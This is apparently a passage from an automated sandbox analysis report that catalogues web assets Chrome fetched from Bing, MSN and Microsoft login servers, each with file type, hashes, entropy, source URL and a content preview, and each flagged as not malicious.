                                                                                                                                                                                                                                                                        SHA-512:4367CE147C7FA4590838F23C47819B8954858128336979E28BA116924B92660A7CBDC9A8292C45C5F26FF591F423F03DFADCB78A772DBE86AC5FBABF0B4E7711
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/4L4QdyjTv0HYE2Ig2ol9eYoqxg8.svg
                                                                                                                                                                                                                                                                        Preview:<svg focusable="false" width="24px" height="24px" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.. <rect fill-opacity="0.2" fill="#000" x="0" y="0" width="24" height="24" rx="2"></rect>.. <g transform="translate(4, 4)">.. <path d="M13.2916881,1.29304814 L7.99395739,6.59077883 L2.69622669,1.29304814 C2.30349711,0.913737214 1.67923378,0.919161894 1.29315522,1.30524045 C0.907076669,1.691319 0.90165199,2.31558234 1.28096291,2.70831192 L6.57869361,8.00604261 L1.28096291,13.3037733 C0.90165199,13.6965029 0.907076669,14.3207662 1.29315522,14.7068448 C1.67923378,15.0929233 2.30349711,15.098348 2.69622669,14.7190371 L7.99395739,9.42130639 L13.2916881,14.7190371 C13.6844177,15.098348 14.308681,15.0929233 14.6947596,14.7068448 C15.0808381,14.3207662 15.0862628,13.6965029 14.7069519,13.3037733 L9.40922117,8.00604261 L14.7069519,2.70831192 C15.0976827,2.31746305 15.0976827,1.683897 14.7069519,1.29304814 C14.316103,0.902317288 13
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 138826
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):48749
                                                                                                                                                                                                                                                                        Entropy (8bit):7.995400893845683
                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                        SSDEEP:768:sDIdNMzlByAv6HQSjbXQR94rirbAv4J73auxvBlq2gephTCR4OIs5CTvNMpJ:sgN0BngbXQz4OrbAwJOAlq2L1OI+CTWJ
                                                                                                                                                                                                                                                                        MD5:A44AEEC685F7CD6F9E0537D91AEAC1B0
                                                                                                                                                                                                                                                                        SHA1:779C3A70D1AF7F5239C3D04B369421F02D549D0A
                                                                                                                                                                                                                                                                        SHA-256:C3989B68106E064AC98A68A5FA292F82C72C535B85F255FD8025AAFCE7AFA3C0
                                                                                                                                                                                                                                                                        SHA-512:9677A07217C73255EA0E4AB4E379AA1D8175D7C5F33BA1E24561BBBF1E1BAFF8C5758A0615B1C782735396C62D2CAA75A86E247262FF2C26677E023AC95D87F4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://aadcdn.msauth.net/shared/1.0/content/js/BssoInterrupt_Core_PukjvzWvVsvIJFh4xJhtXA2.js
                                                                                                                                                                                                                                                                        Preview:............{_.8.0...).w.cOL..hpp.M.....!azfi...(......4.y?...d.C..s~g...J.T.*U.J...k.S......Tz..e.r....x|yX...?+g......?......2.'....^,F.0..Q...a4.#/.qe....M*.(.V.{Q.E..1L....(4...bBu.r.E.S...A..j....J....<.'. L...x..j..K...<....x...+..0..p.T"1...|$.Cz..v.D%.Ie.F.=..V.!..5....c...?.#.pL.._..b.gs.4....SMkDZ..7.J.V..l}..?....1}......0.......8.TB..*....^..f..O.*w.. ...`.H......'....Og...].q..fb.cK.?...)2.T..a.}.+f....oo...g.'.,v67...~>.....(..M...>....m..;?...s...S.......p........../.......o.........;.=6...`..3....+...[.... ......7....7v...{}....D.w.};.V.......|.\S..O..i&j.^|...Jf...6..7};......f}}^...{._.+...n...H.t+..CUzv.U..:.q=............Z.Z|...2......}........!b....upcE".GA..k@...q.....>.N`O...-3...-..,DMLTY;.......V....e+.>..`..b&n7..'-#FV.W.p.......Xs.(..{Y.}..-...>..E...XQge.X.KP.&......Re...b*23v..L.a...7......c.a...9...l..Z.`.F.._%>U.7.."..7.M...N.."....v?.P..c...._G.....d....*.|.e{Z."/...e..!..v/...{{yI_.Dr4!...{.{wg.T.........(..%...+.^..`>.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1829
                                                                                                                                                                                                                                                                        Entropy (8bit):3.958376074234918
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:tVvnjuDebkQ/KN8NUfgVNsukQyO/HOOF7ygEjzKzBF6RR2poIugpDco1EISiezGA:rnC2R/74gVNbWgUzKznSooILDpOHxh
                                                                                                                                                                                                                                                                        MD5:B006565D5EE6ED73849DDBC655EDEA32
                                                                                                                                                                                                                                                                        SHA1:3271C938DF715185E983EA682EFC9C7E870C58E0
                                                                                                                                                                                                                                                                        SHA-256:51F195E58525D32BFEC69FB435044246E340540C88CBBAC83501969EF638820E
                                                                                                                                                                                                                                                                        SHA-512:6D8126DA32DE2600693541C95A010BA5CB4B9A97401BC7EA335974DB451020677550A05D5379DD5670719B87CBC72B9E519F007769EF1AF1BD3D03C33900635C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">. <path d="M13.5001 5.00088C14.8255 5.00088 15.91 6.03236 15.9947 7.33639L16 7.50075V13.5001C16 14.8255 14.9685 15.91 13.6645 15.9947L13.5001 16H7.50075C6.17534 16 5.09084 14.9685 5.0062 13.6645L5.00088 13.5001V7.50075C5.00088 6.17534 6.03236 5.09084 7.33639 5.0062L7.50075 5.00088H13.5001ZM13.5001 6.00083H7.50075C6.7211 6.00083 6.08038 6.59569 6.00769 7.3563L6.00083 7.50075V13.5001C6.00083 14.2798 6.59569 14.9205 7.3563 14.9932L7.50075 15.0001H13.5001C14.2798 15.0001 14.9205 14.4052 14.9932 13.6446L15.0001 13.5001V7.50075C15.0001 6.7211 14.4052 6.08038 13.6446 6.00769L13.5001 6.00083ZM10.5004 7.00078C10.7459 7.00078 10.95 7.17764 10.9924 7.41088L11.0004 7.50075L10.9994 10.0005L13.5005 10.0006C13.7766 10.0006 14.0004 10.2245 14.0004 10.5006C14.0004 10.746 13.8236 10.9502 13.5903 10.9925L13.5005 11.0006L10.9994 11.0004L11.0004 13.5005C11.0004 13.7766 10.7766 14.0004 10.5004 14.0004C10.255 14
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):726
                                                                                                                                                                                                                                                                        Entropy (8bit):4.636787858533541
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:tbH41nlcWYiB1+Xl0ML2t1iOfEmmgaUEUZQ6nMAIPWSxs4yPISEIe9t8aayPISEx:t741nTYifqLL2+O7mgaxSQ6MFnE3nkO
                                                                                                                                                                                                                                                                        MD5:6601E4A25AB847203E1015B32514B16C
                                                                                                                                                                                                                                                                        SHA1:282FE75F6FED3CFC85BD5C3544ADB462ED45C839
                                                                                                                                                                                                                                                                        SHA-256:6E5D3FFF70EEC85FF6D42C84062076688CB092A3D605F47260DBBE6B3B836B21
                                                                                                                                                                                                                                                                        SHA-512:305C325EAD714D7BCBD25F3ACED4D7B6AED6AE58D7D4C2F2DFFCE3DFDEB0F427EC812639AD50708EA08BC79E4FAD8AC2D9562B142E0808936053715938638B7C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/KC_nX2_tPPyFvVw1RK20Yu1FyDk.svg
                                                                                                                                                                                                                                                                        Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" enable-background="new 0 0 16 16">.. <path d="M0 0h16v16h-16v-16z" fill="none"/>.. <path fill="#007DAA" d="M11 4h4l-5-4v3c0 .552.447 1 1 1zm-3-1v-3h-4.5c-.828 0-1.5.672-1.5 1.5v13c0 .828.672 1.5 1.5 1.5h10c.828 0 1.5-.672 1.5-1.5v-8.5h-4c-1.654 0-3-1.346-3-3zm4.707 10.707c-.181.181-.431.293-.707.293h-7c-.276 0-.526-.112-.707-.293s-.293-.431-.293-.707.112-.526.293-.707.431-.293.707-.293h7c.276 0 .526.112.707.293s.293.431.293.707-.112.526-.293.707zm0-5.414c.181.181.293.431.293.707s-.112.526-.293.707-.431.293-.707.293h-7c-.276 0-.526-.112-.707-.293s-.293-.431-.293-.707.112-.526.293-.707.431-.293.707-.293h7c.276 0 .526.112.707.293z"/>..</svg>
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (14531)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):23513
                                                                                                                                                                                                                                                                        Entropy (8bit):5.562038741110365
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:yW3v4ktWbI+jGE6f9WH4K81QS48CwosaadJgYK0M2a1Fgqid4CgBTFMSRO1U7z+r:yI4ktWbI+jGVlWH48SdVlnJw0Mr1FqUi
                                                                                                                                                                                                                                                                        MD5:0C849C0A6E556F06CA3DE2553CC5B804
                                                                                                                                                                                                                                                                        SHA1:23B69798BC7B8FB9FE3EE81AC470EA1C25AFE890
                                                                                                                                                                                                                                                                        SHA-256:2A162D9F7AAFC2C070F80BEA655394714A77EA236CB5C040975C53BEE5B00AB0
                                                                                                                                                                                                                                                                        SHA-512:A59D47FB533C63AF12977A5F92CE9147539B85AD1EC32C9F76C2073AB458F01639522EB489E780BAC909DD4E69150BAD2159C68C25FFB6541F774A7F9E9F4AE8
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/bundles/v1/bingHomepage/latest/toast.dc9b88b50f8e7fd0aa01.js
                                                                                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_msnews_msnews_experiences=self.webpackChunk_msnews_msnews_experiences||[]).push([["toast"],{76846:function(t,e,o){o.r(e),o.d(e,{ToastEvents:function(){return l},ToastWC:function(){return S},ToastWCStyles:function(){return $},ToastWCTemplate:function(){return Ht},ToolingInfo:function(){return Ot},getBackgroundColor:function(){return T},getColor:function(){return k}});var a=o(45900),s=o(63070);var n=o(33940),i=o(38156);const r={telemetryContracts:{toastCloseButton:{name:"Close",behavior:i.wu.Close,action:i.Aw.Click,type:i.c9.ActionButton}},savedStoriesWithinPersonalizeUrl:"/{locale}/feed/personalize#saves",standaloneSavedStoriesUrl:"/{locale}/feed/personalize/saves",urlBase:"https://www.msn.com",locale:"{locale}",defaultBottomPosition:32},l={ready:"toast-wc-ready"};var c=o(85334),d=o(66925);const p=[];var u=o(83227),h=o(97164),g=o(92531),f=o(18544),w=o(58958),x=o(42689),v=o(38492),b=o(26738),m=o(29717),y=o(92059),C=o(78923);const T=(t=!1,e,o)=>{const a=(0,
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (58239), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):58445
                                                                                                                                                                                                                                                                        Entropy (8bit):5.358711956827798
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:EEL44gJI13TpYgwnTQLuy75yhLKZic1zIpHB6:EU1NVMUOY
                                                                                                                                                                                                                                                                        MD5:99B7CC18F2140487AFF3271EAA283D52
                                                                                                                                                                                                                                                                        SHA1:309E7E51E0B2E3B108A875C1A9D2FE8BD4BBCCD0
                                                                                                                                                                                                                                                                        SHA-256:893AA4EE542B27370A4F6D1108F622DA26C46DB28FA24AF96A90138374029A58
                                                                                                                                                                                                                                                                        SHA-512:937FED17D13C5CC725A6C1288F0138DF22CB6622E6E68B31D5FFA20D2AB7F9DFF214DCAC532C9CEB8432D181EAB22C7183BF8A8CF7E9264E091A81B4E493359A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/bundles/v1/bingHomepage/latest/libs_location-service_dist_AutoSuggestService_index_js-libs_location-service_dist_profiles_We-d5067e.9cd4b604812228585378.js
                                                                                                                                                                                                                                                                        Preview:(self.webpackChunk_msnews_msnews_experiences=self.webpackChunk_msnews_msnews_experiences||[]).push([["libs_location-service_dist_AutoSuggestService_index_js-libs_location-service_dist_profiles_We-d5067e"],{24474:function(e,t,i){"use strict";i.d(t,{b:function(){return O}});var n=i(33379),o=i(33940),s=i(56692),r=i(38573);const a=new Set(["...","...","...","...","....","...","...","...","...","...","...","...","...","...","...","...","...","...","...","...","...","...","...","......",".......",".....",".......","........"]);function u(e){var t;if("zh-cn"===(null===(t=null==e?void 0:e.language)||void 0===t?void 0:t.toLowerCase())){if(!(null==e?void 0:e.country))return!1;if(null==e?void 0:e.addressLine){if(!(null==e?void 0:e.locality)&&!(null==e?void 0:e.subRegion)&&!(null==e?void 0:e.reg
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                                                        Entropy (8bit):4.769846064020748
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:6v/lhPahmtru/sucE9sSwYO8bzPFNaUmujt+yQJld:6v/7/dDYpRNa8Q
                                                                                                                                                                                                                                                                        MD5:88FDEBA867664DABC5C40ADAA9640B30
                                                                                                                                                                                                                                                                        SHA1:1BFCCA5AD54333779920CB675D9A814750EF26DF
                                                                                                                                                                                                                                                                        SHA-256:306A38F1F6BA51824D11C22B183A2D21120B66B50D3E2DFA60A2181A75DCAF09
                                                                                                                                                                                                                                                                        SHA-512:C4498290FB3811CC2122393B5D1E059991EDCD1BB76A40E07CFB69FDB07F5B0FC51C300F23B577857397F5EEF72E6CF0E2E76B08CF9EBD55BEC9A981685B8707
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+......IDATx.cY........+....ZY.X)5.R...2R...6.]@...@,..cx..!C@h2.........vn]. $".......M...7.1....AAI....s.:z...U}.X........^...6.f...7...../.?b`ee..}a`bb`...e.....|....._.|`......K...2#....!a.p6....g...n.FF..P@R:`......H.."..C......=k...~....IEND.B`.................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1391
                                                                                                                                                                                                                                                                        Entropy (8bit):4.796412914000846
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:t4LxSdeBU4dxCey0fA53J/S/7/sG5BmefEqrR5GTGOby2NF2E/:+xSUBU4S55Z/aB5BmefEqrRYK6
                                                                                                                                                                                                                                                                        MD5:620580657E8A45B4A7B8450B8DA5CD32
                                                                                                                                                                                                                                                                        SHA1:922187F6E9192BA43886FB43B70C15735CAFB9E8
                                                                                                                                                                                                                                                                        SHA-256:91DE3100632E986CDB6897793EF1B2A8655B15ED4145098CA489856C043D207E
                                                                                                                                                                                                                                                                        SHA-512:F3CE71CD92BA2C6ABD6CDEE48F677522439CAD023042D56728E5CB2DED5EC51D1170308FB1524C4A352AC6C5E4E514147D21B99667CCE54CE35A73D91DD27E4B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 40 40" width="64" height="64">.. <style type="text/css">.. .anim {.. animation-name: blink;.. animation-duration: 1s;.. animation-iteration-count: infinite;.. fill: #05E9F5;.. transition-timing-function: linear;.. }.. @keyframes blink {.. 0% {.. opacity: 0.. }.. 50% {.. opacity: 1.. }.. 75% {.. opacity: 1.. }.. 100% {.. opacity: 1.. }.. }.. .delay1 {.. animation-delay: 0s;.. }.. .delay2 {.. animation-delay: .125s;.. }.. .delay3 {.. animation-delay: .25s;.. }.. .delay4 {.. animation-delay: .375s;.. }.. .delay5 {.. animation-delay: .5s;.. }.. .delay6 {.. animation-delay: .675s;.. }.. .delay7 {.. animation-delay: .75s;.. }.. .delay8 {.. animation-delay: .875s;.. }.. </style>.. <circle class="delay1 anim" cx="20" cy="8" r="3" />.. <circle class="delay5 anim"
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):23471
                                                                                                                                                                                                                                                                        Entropy (8bit):7.966359359884777
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:eWItG6hWkFT/EmrwCXtLWUHWymJJhBtOvUb1hg/tLiY934aKTqVqvkfcUd3Zb/5k:exJx8mrXXt5LmJBtYUZhgFLi83g2lbdM
                                                                                                                                                                                                                                                                        MD5:04C56DD2B22F2C5CF19A6D53CCA6C76E
                                                                                                                                                                                                                                                                        SHA1:FF0E74702813EC206B64DF093A6EA1677726645F
                                                                                                                                                                                                                                                                        SHA-256:094775A794E227D1569FB612A94D2EC0C58CBF9C10B68BA8C782580FBADC525C
                                                                                                                                                                                                                                                                        SHA-512:D859E611EAF4ACEC6E8D898566DAE8C61CE3AF6324B35880898578525F09B1419983FE79A398A5C480DFE8CDF7D9D5F9D414A28DE02D23799991CEBBB9AD062B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://th.bing.com/th?id=ORMS.1ea0977d879a5cef001600a92af32387&pid=Wdp&w=300&h=225&qlt=90&c=1&rs=1
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..ks....+..n..&6.6.....n."..t..........W......3..U..gR;U.<b.|{U..M....8..Y7.....tH~......1.RqLjM.{7.1..G..I~.X..#..K.AL.T.!....L..u_........z..P......./u._G..kU.......+.._...`.SZ1.(.Q)V..|.q..Ho../.F.F..6a.I.T...q_Iyk.(1F..R.1.?.T.|.s...Lw.K..K.+P....>......../.L.<..ZN...&.s...:.....O".\|..$`.V..k..k....K.S......T.....S..../.....=X0?.W....b..&}..W.riv....L}
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (561), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):561
                                                                                                                                                                                                                                                                        Entropy (8bit):4.889905545792464
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:kdXCJAUQcnGfiLQGW3lfbs4HbrdE6/Wj5sSxE6fYXChX0d9JAjU:8CJWcujo47renmSSWYMy9JyU
                                                                                                                                                                                                                                                                        MD5:6D69808BC13425DCFBCD61C2DCD11305
                                                                                                                                                                                                                                                                        SHA1:76CCC14A62EDF6E44901A237B3460E22874B6F53
                                                                                                                                                                                                                                                                        SHA-256:88D86FE4AD7534BB5D79D6CEAFDC527ADE975D07F49A856CE0EE6783161516C3
                                                                                                                                                                                                                                                                        SHA-512:FCD132A1D6C53B897FA9B60DE7A054CD429DF3EAEB19F40367968FCDDE12B270C71685D6F8991A1F0A12BE14F981FD6BFADE30F43E4C9527313F978EFD87C215
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:var OutlinePolyfil=function(){function n(){var n=this;this.attachHandlers=function(){addEventListener("keydown",n.onTabKey);addEventListener("focusin",n.onFocusIn);addEventListener("mousedown",n.onMouseDown)};this.onTabKey=function(n){n.key=="Tab"&&document.body.classList.add("tabbing")};this.onFocusIn=function(t){t.target===n.firstFocusable&&document.body.classList.add("tabbing")};this.onMouseDown=function(){document.body.classList.remove("tabbing")};this.firstFocusable=document.querySelector("#bLogo");this.attachHandlers()}return n}();new OutlinePolyfil
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):567790
                                                                                                                                                                                                                                                                        Entropy (8bit):5.203401736061893
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:ol04MfNzqRUFExBZPmSy+ixHPDNJMMUnzONCRBEpORcwN0m19tNTnCOD07IzdbV9:20nmTUdydGGll
                                                                                                                                                                                                                                                                        MD5:F22AEF5E40B4FC45D422D6326D4E82CF
                                                                                                                                                                                                                                                                        SHA1:4FA95CB3A8AA07BAE7DFA1485F26CBC1BA8FC042
                                                                                                                                                                                                                                                                        SHA-256:597A5A961AFF54E9E5AD009C670674A5DC11C9F829764B32B925066B5AB9DC8B
                                                                                                                                                                                                                                                                        SHA-512:216578580CED656436D0264C430EE2D3D464AB29AE82DF4911E56E364BC1D50577AFDF5AB726748D5F3593664673E92C27C6F0881150CB141E3390560450D3F2
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/T6lcs6iqB7rn36FIXybLwbqPwEI.js
                                                                                                                                                                                                                                                                        Preview:(()=>{var e=[,function(e,t,r){"use strict";var n=this&&this.__createBinding||(Object.create?function(e,t,r,n){void 0===n&&(n=r),Object.defineProperty(e,n,{enumerable:!0,get:function(){return t[r]}})}:function(e,t,r,n){void 0===n&&(n=r),e[n]=t[r]}),i=this&&this.__exportStar||function(e,t){for(var r in e)"default"===r||t.hasOwnProperty(r)||n(t,e,r)};Object.defineProperty(t,"__esModule",{value:!0});var o=r(2);r(6).Events.instance.attachConsoleListener(new o.ConsoleLoggingListener),i(r(64),t)},function(e,t,r){"use strict";var n=this&&this.__createBinding||(Object.create?function(e,t,r,n){void 0===n&&(n=r),Object.defineProperty(e,n,{enumerable:!0,get:function(){return t[r]}})}:function(e,t,r,n){void 0===n&&(n=r),e[n]=t[r]}),i=this&&this.__exportStar||function(e,t){for(var r in e)"default"===r||t.hasOwnProperty(r)||n(t,e,r)};Object.defineProperty(t,"__esModule",{value:!0}),i(r(3),t),i(r(54),t),i(r(55),t),i(r(236),t),i(r(237),t),i(r(238),t),i(r(239),t),i(r(248),t),i(r(249),t),i(r(250),t),i(r(
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1051), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1051
                                                                                                                                                                                                                                                                        Entropy (8bit):5.354709142801451
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:2QmZ6qv3dhazSaxa7onMZN1GqPTz0KmNn4zVAoL3tMTCDU1FA9zR9uHemdXp:2Om74MZN1tPv0KmNjAtMGDTzRPo
                                                                                                                                                                                                                                                                        MD5:F76D06D7669E399DC0788BC5473562BB
                                                                                                                                                                                                                                                                        SHA1:159293D99346A27E2054A812451909DE832CA0D1
                                                                                                                                                                                                                                                                        SHA-256:23F0357AE77648EE38F39960E56507D87F8D690C48E759A0E054F6E691C843EC
                                                                                                                                                                                                                                                                        SHA-512:F5BA3C997F980A2B3DA8B93D0DFF351FA6796BAA705E7831F9EFED24A6C4F0FAAF84CC7F31AC5DAC8A8D05D8D0491ECCD03EDF5892B28B639CBB107271FEB893
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/FZKT2ZNGon4gVKgSRRkJ3oMsoNE.js
                                                                                                                                                                                                                                                                        Preview:(function(){function t(t){typeof Log!==n&&typeof Log.Log!==n&&Log.Log("NcHeader","Rewards",t,!0)}function i(){var u,e,r,a,o,v,y,s,i,h;if(typeof bepcfg===n)t("bepcfg Undefined");else if(u=_ge("nc_iid"),u){var c=typeof bepcfg.wb!==n,l=typeof bepcfg.v!==n,f=u.getAttribute("_IG");if(f&&f.length||(f=_G.IG),e="&IID="+u.getAttribute("_iid")+"&IG="+f,l)try{sj_cook.get("")}catch(p){e+="&CID="+u.getAttribute("_cid")}r="/rewardsapp/ncheader?ver="+_G.AppVer+e;a=r;try{o=undefined;v=/(^|&)uncrunched=1(&|$)/i;o=v.exec(_w.location.search.substr(1));r=r+(o?"&uncrunched=1":"")}catch(w){r=a}y=_ge("rewardsEntryPoint");y&&(r="".concat(r,"&loadEntryPointsScript=1"));s=[_w.top,_w];i=sj_gx();i.open("POST",r,!0);i.setRequestHeader("Content-type","application/x-www-form-urlencoded");c&&(i.onreadystatechange=function(){i&&i.readyState==4&&i.status==200&&sj_appHTML(sj_b,i.responseText)});h="wb="+(c?bepcfg.wb:"0");l&&(h+=";i="+(s[0]!==s[1].self?0:1)+";v="+bepcfg.v);i.send(h)}else t("nc_iid NotFound")}var n="undefi
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                                                        Entropy (8bit):7.18141036104189
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:6v/7Bj1Q6D8gq9nUFgDaSjhwq3sb8rIZ+hoe12QnsWdoS7/:q6o+vevqnrIZe5wzWCS7/
                                                                                                                                                                                                                                                                        MD5:DA52398AF0F6906B4EC0C7EF899AA247
                                                                                                                                                                                                                                                                        SHA1:355347D2833AC105AA05C7ED7FD98C6267A805CA
                                                                                                                                                                                                                                                                        SHA-256:49BD0B79D9E7628533517F5DAEA1AAF32982A166E224A441A0FC8138ADF7FACE
                                                                                                                                                                                                                                                                        SHA-512:D26C015ABE0EE3D2A8ADEE2CB051BADB30ADADBDF5C5CFA7128F6C702512B803BE76FF517FFFB1464848D8537749BB511367D1F40CDF0100B844B5756030F4FD
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1jWIH2.img?w=16&h=16&q=100&m=6&f=png&u=t
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+......IDATx....+EQ....).B....5P......<f.2....H...H)F..."..P.1Pny.5...}...j.........Z..........A..,..or...i.h}.e........b-X....K.;....s..Vz"...EB~......au..=......By).L..t.....@..8......VBk3.t..R.i..k.].......8,......@^N@..."...... ....i.....?.\..VI...(.j8=....G..Q._..)hi..T.a.IO.{D..0..C...pa.+xQ[U.$..x.......08..e.3..lw..Z..........#...)..:. ..+F.fN@.{.}}.9?.&f......4.fN.N....5.~.C.$.....$a6gE......IEND.B`.................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):7759
                                                                                                                                                                                                                                                                        Entropy (8bit):7.90795331559921
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:e7eUpdZ2OTm23v1D/bSknDslHCImSrhqllY3sMhBArHEc:e7eUz+m13Tm2S9/hWr9
                                                                                                                                                                                                                                                                        MD5:DA159126182230AC32BFA5D02AE0C847
                                                                                                                                                                                                                                                                        SHA1:5EF4FEBA1483445A723487CC52C4C7E6810F901E
                                                                                                                                                                                                                                                                        SHA-256:82AEE1A9A274104F1443437C50C6ED5C5CCDD39CF14296054CF68654DC4D1114
